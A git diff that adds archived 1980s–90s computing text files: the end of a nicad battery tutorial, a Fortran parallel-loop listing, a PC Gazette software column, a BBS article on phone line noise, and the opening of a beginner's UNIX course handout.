buildup, infrequent use and lack + of full charge all contribute to shortened nicad lifespan. + + Charging and discharging mathematics... + + Charging nicads is generally done automatically by a charging + circuit. Two practical pieces of advice: 1) if the battery + becomes VERY hot something could be wrong 2) if the manufacturer + tells you that the battery will be fully charged after a certain + length of time although it can be left charging longer you will + probably do the nicad a favor by removing it after full charge + is reached. Some clever nicad users simply attach an inexpensive + electrical timer - similar to those used to turn lights on and + off in the evening - directly to the nicad charger to prevent + overcharging. + + Generally nicads have a proper charging rate which depends on + each manufacturers recommendation. For standard nicads which are + NOT quick charge types the proper slow or "trickle" charge rate + is determined by dividing the ampere hour capacity of the + battery by 10. For example if a nicad has a total capacity of 1 + ampere hour, dividing this by ten (1/10) produces a correct + trickle charging rate of .1 amps or 100 milliamps. Quick-charge + nicads can accept a charge rapidly and the suggested charging + rate is determined by dividing the ampere hour capacity of the + battery by 3 rather than by 10. These figures represent the + trickle charge rate which theoretically means the nicad "could" + be safely left charging indefinitely without harm. + + Higher efficiency chargers are designed not to simply trickle + charge nicads but start a discharged battery at a HIGH rate of + charge and then taper the charging current back quickly to the + safer "trickle" charge rate once full charge is reached. Usually + for regular nicads this "initial surge charge" can be as high as + the ampere hour capacity divided by 3. For quick charge nicads + this "initial surge charge" can be as high as the ampere hour + capacity divided by 1. Obviously these are very high charge + rates and are provided to discharged batteries and then + quickly discontinued once full charge is approached. Clearly a + charging circuit of this sophistication is expensive and may + even contain its own microprocessor to sense the discharge level + of the nicad and calculate the optimum charge rate, time and + trickle charge transition. Since we have previously discussed + the adverse affect of heat on nicads it is essential to note + that NICADS SHOULD BE CHARGED IN A COOL OR ROOM TEMPERATURE + location since they normally generate heat when charged. If you + minimize heat buildup - especially during the charging cycle - + you will prolong the useful life of your nicad battery. + + Discharging a nicad - especially if you are trying to remove a + "memory" problem such as that discussed earlier does NOT mean + discharging a cell to zero volts. Usually the correct discharge + voltage is about 1.0 volts. This may seem odd when you consider + that the fully charged cell has a 1.2 volt reading, but in fact + at 1.0 volts a typical nicad cell has released about 90% to 95% + of its energy - another eccentric, but predictable behavior of + nicads given the rapid "voltage drop off" as they near the end + of their three or four hour life in a laptop computer. + + Shelf life. While carbon zinc and alkaline batteries can hold + their charge for years, nicads lose their charge relatively + quickly. Although it varies, one quick rule of thumb is that a + typical fully charged nicad will lose roughly 25% to 35% of full + charge in one month. Then another 25% to 35% of THE CHARGE + REMAINING in the next month. And so on and so on. Thus if you + have several nicad batteries you want to charge for a trip you + will be taking in a month, it is probably better to charge ALL + OF THEM the final week just before the trip rather than the + month before. For want of a better phrase, this might be called + "shelf discharge" and is normal with all nicads and has to do + with slight electrical leakage and chemical compound decay + internally within a charged nicad which sits on a shelf. Cooling + or refrigerating the nicad (but NOT freezing) will slow this + "shelf discharge" since you are cooling and slowing the + breakdown reaction. In fact ALL batteries will last longer when + refrigerated until they are used. Simply store them in + individual sealed plastic bags (to minimize moisture + condensation) and place them in the refrigerator. + + And so we conclude with a little summary.... + + 1) Do exactly what the manufacturer suggests for both + discharging and recharging a nicad. + + 2) Keep temperatures - especially during charging - cool or at + normal room temperature. + + 3) Never short circuit a nicad intentionally or accidentally. + + 4) Try cycling a nicad through several COMPLETE discharge and + recharge cycles if it "appears" to be faulty an incapable of + operating your equipment for a normal three or four hour + operating period. + + 5) Remove nicads from charging circuits or discontinue charging + when full charge has been reached. + + 6) Watch for white flaky corrosion deposits on the upper edge of + the cell near the pressure vent this can mean impending cell + failure and electrolyte loss. + + 7) Dispose of permanently defective nicads properly - contact + the manufacturer for instructions since cadmium is a dangerous + toxic metal and has been banned from many dump sites. Try + calling your local city hall and ask who can answer a question + about cadmium metal waste disposal. + + 8) When the nicad battery power begins to drop near the end of a + discharge cycle it will drop VERY QUICKLY due to the rapid + characteristic dropoff of nicads. Prepare for laptop shutdown + quickly. + + 9) Cycle your nicads through a FULL DEEP discharge and FULL + COMPLETE recharge frequently - they will last LONGER before you + must dispose of them and deliver MORE power when used. + + 10) Infrequently used nicads should be charged and discharged at + least once or twice every two or three months to prolong their + usable lifetime before permanent failure. + + 11) If your nicads are stated by the manufacturer to be quick + charge type, you can probably prolong their life by slow or + trickle charging them (if your charger provides that option) + since you will minimize heat and gas buildup within the cell. + Just because they can be quick charged does not mean they MUST + be quick charged. Nicads last longer and deliver more power when + not driven to extremes of temperature or overcharging. + + Tutorial finished. Be sure to order your FOUR BONUS DISKS which + expand this software package with vital tools, updates and + additional tutorial material for laptop users! Send $20.00 to + Seattle Scientific Photography, Department LAP, PO Box 1506, + Mercer Island, WA 98040. Bonus disks shipped promptly! Some + portions of this software package use sections from the larger + PC-Learn tutorial system which you will also receive with your + order. Modifications, custom program versions, site and LAN + licenses of this package for business or corporate use are + possible, contact the author. This software is shareware - an + honor system which means TRY BEFORE YOU BUY. Press escape key to + return to menu. + + + + diff --git a/textfiles.com/computers/bauer.lst b/textfiles.com/computers/bauer.lst new file mode 100644 index 00000000..5df97b05 --- /dev/null +++ b/textfiles.com/computers/bauer.lst @@ -0,0 +1,200 @@ + +_OPTIMIZING IN A PARALLEL ENVIRONMENT_ +by Barr E. Bauer + +[LISTINÇ ONE] + + program test 1 +* 2 +* purpose is to test SGI parallelization scheme for loop selection, 3 +* numerically-intensive calculations, and total reduction. See text 4 +* for details. 5 +* 6 + parameter (MAXFIRST=250, MAXSECOND=250, MAXTHIRD=10) 7 + real*8 a(MAXTHIRD,MAXSECOND,MAXFIRST) 8 + real*8 b(MAXTHIRD,MAXSECOND,MAXFIRST) 9 + real*8 sub_total(MAXFIRST), partial_total(4) 10 + real*8 d(MAXTHIRD), c, tmp ! local variables 11 + real*8 dist(MAXSECOND,MAXFIRST), grand_total 12 + real*8 grand_total ! test for proper operation 13 + logical parallel ! selects 2-version loops 14 + integer*4 iflag ! used to show LASTLOCAL value 15 + 16 + data parallel /.false./ 17 + data sub_total, iflag /MAXFIRST*0.0, 0/ 18 +* 19 +* outer loop: contains both interior loops 20 +* 21 + 22 +* C$doacross local(k,j,i,tmp,d,c), share(a,b,sub_total,dist), 23 +* C$& lastlocal(iflag) 24 + 25 + do i = 1, MAXFIRST 26 +* 27 +* first inner loop: fills arrays a and b 28 +* 29 + 30 +* C$doacross local(j,k,c), share(i,a,b) 31 + 32 + do j = 1, MAXSECOND 33 + do k = 1, MAXTHIRD 34 + a(k,j,i) = dsqrt(dfloat(i*j*k)) 35 + c = 1.0 - a(k,j,i) 36 + if (c .le. 0.0 .and. i .lt. j*k) then 37 + c = -c 38 + else 39 + c = c**2 40 + endif 41 + b(k,j,i) = 32*(dcos(c)**5)*dsin(c)- 42 + 1 32*(dcos(c)**3)*dsin(c)+ 43 + 2 6*dcos(c)*dsin(c) 44 + enddo 45 + enddo 46 +* 47 +* seond inner loop: determines distance and starts summation 48 +* 49 + 50 +* c$doacross local(j,k,d,tmp), share(i,a,b,dist,sub_total), 51 +* c$& lastlocal(iflag) 52 + 53 Š do j=1, MAXSECOND 54 + tmp = 0.0 55 + do k = 1, MAXTHIRD 56 + d(k) = a(k,j,i) - b(k,j,i) 57 + enddo 58 + do k = 1, MAXTHIRD 59 + tmp = tmp + d(k)**2 60 + enddo 61 + dist(j,i) = dsqrt(tmp) 62 + if (dist(j,i) .le. 0.1) iflag = iflag + 1 63 + sub_total(j) = sub_total(j) + dist(j,i) 64 + enddo 65 + enddo 66 +* 67 +* the next section is an example of sum reduction optimized to the 68 +* parallel environment and the use of a more efficient 2 loop summation 69 +* 70 +* if -mp option is active, parallel is set to .true. which then 71 +* selects the parallel version 72 +* 73 + 74 +C$ parallel = .true. 75 + grand_total = 0.0 76 + if (parallel) then ! parallel version 77 +C$ num_threads = mp_numthreads() 78 + ichunk = (MAXFIRST + (num_threads - 1))/num_threads 79 + 80 +C$doacross local(k,j), 81 +C$& share(num_threads,partial_total,sub_total,ichunk) 82 + 83 + do k = 1, num_threads ! this loop is parallelized 84 + partial_total(k) = 0.0 85 + do j = k*ichunk - ichunk + 1, min(k*ichunk,MAXFIRST) 86 + partial_total(k) = partial_total(k) + sub_total(j) 87 + enddo 88 + enddo 89 + do j = 1, num_threads ! smaller loop handled as scalar 90 + grand_total = grand_total + partial_total(j) 91 + enddo 92 + else ! the scalar version 93 + do j = 1, MAXFIRST 94 + grand_total = grand_total + sub_total(j) 95 + enddo 96 + endif 97 + 98 + if (parallel) then 99 +C$ write (*,10) grand_total, num_threads 100 +C$ write (*,20) iflag 101 + else 102 + write (*,30) grand_total 103 + write (*,40) iflag 104 + endif 105 + stop 106 +C$10 format(1x,'grand total = ',g10.3,'threads = ',i4) 107 +C$20 format(1x,'parallel iflag = ',i10) 108 Š30 format(1x,'grand total = ',g10.3) 109 +40 format(1x,'scalar iflag = ',i10) 110 + end 111 + + + +[LISTINÇ TWO] + + +(source code) + + subroutine example(a, b, c, n) + integer*4 n + real*4 a(n), b(n), c(n) + + (additional code) + +c$doacross local(i, x) + do i=1, n + x = a(n) * b(n) + c(n) = x**2 + enddo + + (additional code) + + return + end + +(the loop is transformed to) + + subroutine _example_1( + 1 _local_start, ! index starting value Š 2 _local_ntrip, ! number of loop executions + 3 _incr, ! index increment + 4 _my_threadno) ! unique process ID number + + integer*4 _local_start, _local_ntrip, _incr, _my_threadno + + integer*4 i ! declared local + real*4 x ! declared local + + integer*4 _tmp ! created local + + i = _local_start + do _tmp = 1, _local_ntrip + x = a(i) * b(i) + c(i) = x**2 + i = i + _incr + enddo + return + end + + +Examplå 1º A typical DÏ loop + + +do i = 1, n + a(i) = x * b(i) +enddo + + +Examplå 2º Á DÏ looð iî whicè thå arraù variablå referenceó á +valuå thaô ió noô currenô witè ôhå index + +do i = 2, n + arr(i) = b(i) - arr(i-1) +enddo + +Examplå 3º Aî examplå oæ loaä imbalance + + do i = 1, n + do j = 1, i + a(j, i) = a(j, i) * xmult + enddo + enddo + + +Examplå 4º Loaä balancing + + num_threads = mp_numthreads() +c$doacross local(i, j, k) + do k = 1, num_threads + do i = k, n, num_threads + do j = 1, i + a(j, i) = a(j, i) * xmult + enddo + enddo + enddo +  \ No newline at end of file diff --git a/textfiles.com/computers/bb b/textfiles.com/computers/bb new file mode 100644 index 00000000..3d60ab4a --- /dev/null +++ b/textfiles.com/computers/bb @@ -0,0 +1,148 @@ + ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄ¿ ÚÄÄÄÄ¿ÚÄÄÄÄÄÄÄÄ¿ÚÄÄÄÄÄÄÄ¿ + ³ Ú¿ ³ ³ ³³ ³³ Ú¿ ³ ³ Ú¿ ³ ³ ³³ ³³ Ú¿ ³ + ³ ³³ ³ ³ ÚÄÄÙÀÄ¿ ÚÄÙ³ ³³ ³ ³ ³³ ³ ³ ³ÀÄ¿ ÚÄÙ³ ³ÀÄÙ + ³ ÀÙ ÚÙ ³ À¿ ³ ³ ³ ÀÙ ³ ³ ÀÙ ÚÙ ³ ³ ³ ³ ³ ÀÄÄ¿ + ³ Ú¿ À¿ ³ ÚÙ ³ ³ ³ ³ ³ Ú¿ À¿ ³ ³ ³ ³ ÀÄÄ¿ ³ + ³ ³³ ³ ³ ÀÄÄ¿ ³ ³ ³ Ú¿ ³ ³ ³³ ³ ³ ³ ³ ³ ÚÄ¿³ ³ + ³ ÀÙ ³ ³ ³ ³ ³ ³ ³³ ³ ³ ÀÙ ³ ³ ³ ³ ³ ³ ÀÙ ³ + ÀÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÙ ÀÄÄÄÄÙ ÀÄÄÄÄÙÀÄÙ ÀÄÄÄÄÄÄÄÙ ÀÄÄÄÄÙ ÀÄÄÄÄÙ ÀÄÄÄÄÄÄÄÙ + Copyright 1986 Bon Erreur Logiciel, S.A. + by Tim Conner, Jr. +Hello and welcome to Beta Bits! This *** CONTINUED FROM LEFT COLUMN **** +area of PC GAZETTE will cover the world Item Compaq IBM IBM Modified +of software. This includes what is now Name PC-Plus PC/XT AT IBM AT +available and what is coming out in the --------------------------------------- +future. I will be writing about Standards: +software program being beta tested and +those programs that are coming out. Disk Size 10 M. 10 M. 20 M. 20 M. + Mem Chip 4.77 4.77 6.22 10 +As a beta tester for five major +software companies, I have the dubious +honor of really testing the new Ver. 1.3: +software releases before it is released +to the general public. Mem Test N/A N/A N/A N/A + Disk Dir 1'22" 1'52" 58.0" 45.7" +You are probably wondering what a Beta Opt 5'32" 16'12" 22'23" 14'12" +Tester does. Well, it is a group of +dedicated users that a software company +picks to have test every possible Ver. 2.0: +aspect of their products. This includes +testing of software, read the manual(s) Mem Test 6.0" 7.2" 3.1" 2.6" +for clarity and ease of use. Also, to Disk Dir 1'34" 2'12" 1'2" 58.0" +test each and every item that the Opt 13'42" 13'56" 15'22" 9'42" +software company claims to have fixed, +added, or changed. All of this is very +important to the company as that the As you can see from the above chart, +final software product will either be that this new version 2.0 will take a +profitable or a bust! bit more time to optimize. However, I + have not optimize my hard disk on any +In this premier column, I will be of the machines in over three weeks! +addressing several new items that I am When I was using the 1.3 version, I +currently beta testing and somewhere usually had to optimize the hard drive +else in this issue is a review of a San every other day. Thus, you now see the +Francisco company's two entries into savings in doing an optimization every +the software market. so often. + +One last note, I am not being paid and To order release 2.0, call or write to +I am not endorsing any products the address below: +appearing in Beta Bits or Quicksilver's +Review. All of these reviews and Softlogic Solutions, Inc. +articles appearing in PC GAZETTE are 530 Chestnut Street +strictly for informing you, the public, Manchester, New Hampshire 03101 +of any new items that you might Toll Free Order Number: (800) 272-9900. +purchase in the near future. + +Now that all of the above is over with, Expected release of Disk Optimizer +let's take a look of what is happening version 2.0 will be in two months. +out in the world of software. + Beta Testing #2: +Quicksilver's Snap Judgments: ---------------- +------------------------------ +In the Snap Judgments Department, you This beta testing is actually a +may want to wait on your purchase of preliminary report on Borland's Turbo +Microsoft's QuickBasic version 2.0. Pascal version 4.0. +The reason is that the company is going +into hi-gear fixing several bugs and So far, I have been beta testing for +including a debugger called CodeView over two months on the new release of +into the package. The estimated time Turbo Pascal and I have been really +table for release 3.0 of QuickBasic impressed by this release. The many new +will be within the next four months. features includes the following: + +In other news, those fun loving folks 1) Ability to connect with other +at Ashton-Tate are hurrying to put out Borland products such as Turbo +a newer version of dBase III Plus. I Prolog and Turbo Lightning. +will bet that even with the new 2) End of the 64k code barrier. +release, that there will be more bugs 3) A new quick compiler which speeds +with the software due to the hurried up the compiling time. +pace. + +Within the next month, Microsoft will As of now, the beta testing is going +be releasing the new 'C' language rather slowly. Several beta testers +version 4.0. If you are a registered have found many bugs with this test +user of Microsoft's C or Lattice 'C', version. Borland is trying to fix all +you might want to get in touch with of the problems with another test +Microsoft for their newer version! version due for release to the beta +Version 4.0, is very compatible to testers shortly. +either UNIX or XENIX. This version will +include the new CodeView(R) for I will be giving you a full detailed +debugging. Microsoft's phone number report on Turbo Pascal Version 4.0 in a +is:(206) 882-8080. future column. + +Beta Testing #1: +---------------- Quicksilver's Pet Pieves: +I am currently beta testing a newer ------------------------- +release of Disk Optimizer from +SoftLogic Solutions. This section is where you get a chance + to blow off some steam against software +This version (2.0), is a major companies. If you have any complaints, +enhancement from the old release 1.0 or questions, tid-bits, or comments, +1.3. Many of these enhancements please leave E-MAIL (address to Tim +includes the following items: Conner) at either Polaris BBS or + InfoLink Network. The author reserves + 1) A preliminary memory test the right to edit any mail that I use + 2) Verifies DMA to disk transfer in this column. Please when you leave + from all memory mail, leave your full address as I am + 3) Performs READ AFTER WRITE planning to send any comments (good or + verification bad) to the software company for their + 4) Displays visual feedback of the responses. + process + 5) Sub-directories are no longer Let's start off this section with one + sorted of my pet pieces. + 6) Does NOT alter any file/directory + with an attribute of Hidden or To Ashton-Tate: Where is the dBRUN + System program that you have promised to all + 7) For DOS 3.x users: Allocates all of those buyers of dBase III Plus + directories as close to the File package?? Originally, the dBRUN + Allocation Table as possible program was due out by May 1986 and it + 8) Allocates COM, EXE, SYS, OVL and has been delayed over four times!! Get + Read Only files to the beginning on the ball, folks!! + of the disk, following the + directory clusters. The Final Word: + 9) Allow up to 40 levels of sub- --------------- + directory nesting + 10) Allow up to 1000 directories I hope that you enjoy Beta Bits. Since + 11) Tolerates file names that begin this is the first column, I will + with a period promise to make this column much better + 12) Displays the full disk statistics in the future. All comments are greatly + at the end welcome. Please send your comments to + 13) Displays file names and parent either Polaris BBS or InfoLink Network. + directory or directory name The board's phone numbers are listed + when a read error occurs. elsewhere in this issue. + 14) Recovers unused clusters caused + by deleting files from sub- Within the next few months, I will be + directories. beta testing several software packages + from Microsoft and several software +So far, the beta testing is currently packages from Europe. Europe?? +in it's fifth test. It is about 85-90% +completed. Some minor bugs have been Yes, I said Europe. I will be going +found and I expect that this will be over to Europe to visit and to +remedied within the next test. interview the president of the French + version of Philipe Kahn's Borland +Here are some test timing information International. I will also report on +utilizing version 1.3 and the new the software industry and the +version 2.0 (test #5). Remember, this availability of American software and +test is being conducted on 3 different magazines. Who knows, I might get an +machines with different set-ups. exclusive for PC GAZETTE. I think that + this will be a first for this +*** CONTINUED ON RIGHT COLUMN *** electronic newspaper!! + diff --git a/textfiles.com/computers/bbsnoise.txt b/textfiles.com/computers/bbsnoise.txt new file mode 100644 index 00000000..8cf13ec1 --- /dev/null +++ b/textfiles.com/computers/bbsnoise.txt @@ -0,0 +1,55 @@ +=====[ YOUR SYSTEM HAS NOISE ]============================================== + + +Written by Bill Noel + +Your system has noise!! Ever heard that from one of your users? Of +course you have. And did you have a problem? Most likely not. If you +had a noisy line then all of your calls would have been noisy. Then +where is the problem? It is in what is known as the trunking network. +The Trunking Network is a series of lines and trunks that connect +switching offices. All offices do not have direct trunks, so they are +routed through a connection office. Sometimes these trunks operate on +copper cable, sometimes onT-Carrier, and sometimes on the Fiber Optic +cables that are currently being installed. Any one of these methods can +cause data problems. In fact, any carrier system can cause one way data +errors. That is, the BBS can be seeing errors and the user does not see +them, or vice versa. The latter problem makes your user know for sure +that your BBS is in trouble. + +Trunking Network problems are the most difficult problems to solve. +Southern Bell does not train their Repair Clerks to handle trunking +complaints. What you should do when you experience data problems to a +certain exchange is listen to a quiet line into that office. Try to +describe the problem in terms of steady noise, "popping," "frying," +"other people on the line", etc. Tell the repair clerk that you always +have this type of problem when calling the 457 exchange when calling +from the 999 exchange. Tell her this is a trunking problem and to +please really the report to Trunking Maintenance. Never tell her that +you have a data problem. Southern Bell does not guarantee data +transmission on non-conditioned lines. (However, a non-conditioned line +that meets all of their normal residential service requirements will +support data up to 2400 baud with very little problems). Remember that +when you buy a cheap modem, you get a cheap modem. Why was it cheap? +Because they left things out like noise filters! Keep that in mind when +you buy. + +But what if you are really having trouble on you line? Be careful +before calling Ma Bell with a complaint. If you are not paying them the +$1.00 service charge for House Wire Maintenance, they will hit you with +about $35.00 per hour to fix the problem, or even if they don't fix it +but prove it was you fault. The mini-jacks located in your house can +cause you a lot of noise problems. They get all kind of things in them +like smoke, grease, animal hair, and dust. These things cause the +contacts to corrode. Corrosion causes noise. If you have an OHM meter +and the technical skill to use it, lift the house wire from the +terminals and check for high resistance shorts in you house with all of +your modems and phones removed from the jacks. + +Noise problems can also come from the carbon blocks located in the small +grey box located where the phone lines enter your house. Normally this +condition will appear after an electrical storm or high winds when there +may have been currents flowing on the phone lines. These devices belong +to the phone company and you should not mess with them. +I hope this will shed some light on the subject of noise for you. + \ No newline at end of file diff --git a/textfiles.com/computers/begunix.txt b/textfiles.com/computers/begunix.txt new file mode 100644 index 00000000..95a79de2 --- /dev/null +++ b/textfiles.com/computers/begunix.txt @@ -0,0 +1,7925 @@ + + + + + + + + + + + + + + UNIX for Beginning Users + + + + + + + + + + + + + + + + + + + + + + Developed by: + + User Liaison Section, D-7131 + Denver Office + + [Name and Phone number deleted at authors + Request] + + Revision Date: September 16, 1991 +I. INTRODUCTION + + +A. Audience + + +This course is for individuals who will be using the UNIX +operating system on a Reclamation computer platform. It is +assumed that the student has a general understanding of data +processing concepts. + + + +B. Course Objectives + + +Upon successful completion of this course the student will be +able to: + + 1. Demonstrate a knowledge of basic UNIX ideas. + + 2. Recognize the different types of files and the file + structure. + + 3. Log in and out of UNIX using an interactive terminal. + + 4. Change the password and be aware of other + responsibilities of owning an account. + + 5. Demonstrate a knowledge of where to get help. + + 6. Use the appropriate UNIX commands to display/print + files, copy/move files, change file access permissions, + create/delete directories, and change the current + working directory. + + 7. Transfer a file to another computer platform using File + Transfer Protocol (FTP). Use FTP commands to do the + following: initialize FTP, establish connection, local + computer commands, remote computer commands, close + connection, exit FTP, help command, and special + functions. + + 8. Use an editor to create files, input text, + insert/replace text, copy/move text, and exit/save + changes. + + 9. Use the mail utility to send/receive/delete messages + + 10. Use basic Annex commands to reestablish connection to a + disconnected process. +C. Course Handout Conventions + + +There are several conventions used in this handout for +consistency and easier interpretation: + + + 1. Samples of actual terminal sessions are single-lined + boxed. + + + 2. User entries are shown in bold print and are + underlined. + + QUIT + + + 3. All keyboard functions in the text will be bold. + + (Ret) Backspace + Tab Ctrl-F6 + Print (Shift-F7) Go to DOS (1) + + NOTE: (Ret) indicates the Return or Enter key + located above the right Shift key. + + + 4. Examples of user entries not showing the computer's + response are in dotted-lined boxes. + + + + 5. Command formats are double-lined boxed. + + + 6. Three dots either in vertical or horizontal alignment + mean continuation or that data is missing from the + diagram. + +ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ +³ ³ +³ ³ +³ Multimax, Nanobus, and UMAX are trademarks of ³ +³ Encore Computer Corporation ³ +³ ³ +³ ³ +³ Annex is a trademark of XYLOGICS, Inc ³ +³ ³ +³ ³ +³ UNIX and Teletype are registered trademarks of ³ +³ AT&T Bell Laboratories ³ +³ ³ +³ ³ +³ Ethernet is a trademark of Xerox Corporation ³ +³ ³ +³ ³ +³ ³ +ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +1. BASIC UNIX IDEAS + + +The UNIX operating system is a set of programs that act as a link +between the computer and the user. The programs that allocate +the system resources and coordinate all the details of the +computer's internals is called the operating system or kernel. + +Users communicate with the kernel through a program known as the +shell. The shell is a command line interpreter; it translates +commands entered by the user and converts them into a language +that is understood by the kernel. + +Here is a basic block diagram of a UNIX system. + + + Spread Sheet Compilers + Calculators ³ + ³ ³ + V V + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ The Shell ³ Mail and + ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³<- Message + Inventory ³ ³ UNIX system kernel ³ ³ Facilities + Control --->³ ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ ³ + Systems ³ ³ ³ ³ ³ ³<- Interpreters + ³ ³ ³ Hardware ³ ³ ³ + Formatters ->³ ³ ³ ³ ³ ³<- DBMS + ³ ³ ³ ³ ³ ³ + Calendar ³ ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ ³ Word + Systems ---->³ ³ ³ ³<- Processors + ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ³ + Editors ---->³ ³<- FTP + ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ + +The designers of UNIX used the following Maxims while writing the +new operating system. + + 1. Make each program do one thing well. These simple + programs would be called "tools." + + 2. Expect the output of every program to be the input to + another program. + + 3. Don't stop building new "tools" to do a job. The + library of tools should keep increasing. +1.1 The UNIX System + + +The main concept that unites all versions of UNIX is the +following four basics: + + +Kernel + +The kernel is the heart of the operating system. It schedules +tasks and manages data storage. The user rarely interfaces with +the kernel directly. This is the memory resident portion of the +operating system. + + +Shell + +The shell is the utility that processes your requests. When you +type in a command at your terminal, the shell interprets the +command and calls the program that you want. The shell will +support multiple users, multiple tasks, and multiple interfaces +to itself. The shell uses standard syntax for all commands. +There are two popular shells currently available, the BourneShell +(standard System V UNIX) and the CShell (BSD UNIX). Because +separate users can use different shells at the same time, the +system can appear different to different users. There is another +shell known as the KornShell (named after its designer), which is +popular with programmers. This ability to provide a customized +user interface is one of the most powerful features of UNIX. + + +Commands and Utilities + +Separate utilities can be easily combined to customize function +and output. They are flexible, adaptable, portable, and modular. +They use pipes and filters. There are over 200 standard commands +plus numerous others provided through 3rd party software. + + +Files and Directories + +The directory system supports a multilevel hierarchy. Files and +directories have access protection. Files and directories are +accessed through pathnames. Files support multiple name links. +Removable filesystems are also supported. +1.2 File Structure + + +All data in UNIX is organized into files. All files are +organized into directories. These directories are organized into +a tree-like structure called the filesystem. The following +diagram describes the top level organization of the UNIX +filesystem: + + / + (root) + ³ + ÚÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÁÄÄÄÄÂÄÄÄÄÄÄÂÄÄÄÄÄÄ¿ + ³ ³ ³ ³ ³ ³ ³ + bin dev etc lib tmp usr users + + +These directories, in turn, are also organized hierarchically. + + +For example: + / + ³ + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ ³ ³ + dev etc usr + ³ ³ ³ + ÚÄÄÄÁÄÄ¿ ÚÄÄÄÁÄÄ¿ ÚÄÄÄÄÄÄÄÄÂÄÄÁÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ ³ ³ ³ ³ ³ ³ + dsk rmt init.d rc0.d mail adm spool + ³ + ÚÄÄÄÁÄÄÄ¿ + ³ ³ + acct sa + + +In this example, dev, etc, usr, and adm are directories. +Directories contain other files or directories. Plain files +contain text or binary data and contain no information about +other files or directories. +Users can make use of this same structure to organize their +files. + +For example: + / + ³ + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ ³ ³ + bin users dev + ³ + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ + ³ ³ + bsmith sjones + ³ ³ + ÚÄÄÄÄÄÁÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÁÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿ + ³ ³ ³ ³ ³ + memos progs physics chem history + ³ ³ ³ ³ ³ + ÚÄÄÁÄÄ¿ ÚÄÄÁÄÄÄ¿ ÚÄÄÁÄÄÄ¿ ÚÄÄÁÄÄ¿ ÚÁÄÄ¿ + ³ ³ ³ ³ ³ ³ ³ ³ ³ ³ + mfg eng c f77 mods calcs forms notes loc anc + + +Every file has a name. A filename is composed of one to fourteen +characters. Although you can use almost any character in a +filename, you will avoid confusion if you choose characters from +the following list. + + 1. upper case letters [A-Z] + 2. lower case letters [a-z] + 3. numbers [0-9] + 4. underscore [_] + 5. period [.] + 6. comma [,] + +The only exception is the root directory, which always uses the +symbol /. No other directory or file can use this symbol. + +Like children of one parent, no two files in the same directory +can have the same name. Files in different directories, like +children of different parents, can have the same name. + +The filenames you choose should mean something. Too often, a +directory is filled with important files with names like foobar, +wombat, and junk. A meaningless name won't help you recall the +contents of a file. Use filenames that are descriptive of the +contents. +1.3 UNIX System Files + +In order for you to have a basic understanding of the contents of +some of the system directories, here is a partial list of those +directories and what files they contain: + +/bin This is where the executable files are located. + They are available to all user. + +/dev These are device drivers. + +/etc Supervisor directory commands, configuration + files, disk configuration files, reboot files, + valid user lists, groups, ethernet, hosts, where + to send critical messages. + +/lib compiler libraries + +/tmp scratch processes, editors, compilers, and + databases + +/bsd Berkeley commands + +/mnt empty, used for disks + +/stand boot information + +/lost+found orphans go here (look here after system crash) + +/unix* executable, bootable kernel + +This is not an exhaustive list of directories that contain system +information but it is intended to remove some of the mystery +behind these directories and the types of files they contain. +1.4 Command Line Syntax + + +Users enter commands at the shell prompt. The default +BourneShell prompt is the dollar sign ($). In general, the shell +expects to see the following syntax: + +ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» +º Command Format: command options arguments º +ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ + + +Command - This is the UNIX command. Sometimes the command + is representative of the function. For example, + the command to list the contents of a directory is + ls. The first and third letters of the word + "list" are used. Unfortunately, this is not + always the case. + + +Options - These are also known as flags. The common form + is: + -A + + where A is the abbreviation of the optional + function of the command. For example, the command + ls lists the contents of a directory, while the + command ls -l provides a long listing and ls -C + provides output in columns. Several options can + be combined following one '-'; for example -CF, or + they can be entered separately as -C -F. + + +Arguments - These can be file names, user names, or qualifiers + to the command or one of its options. +Example: + +................................................................. +. $ls -CF sjones . +................................................................. + + +The UNIX command is ls list contents of directory the dash (-) +indicates the options. + + + C = Multiple-column output with entries sorted down the + columns + + F = Put a slash (/) after each filename if that file is a + directory and put an asterisk (*) after each filename + that is executable. + +sjones = name of the directory to list (it can be a + 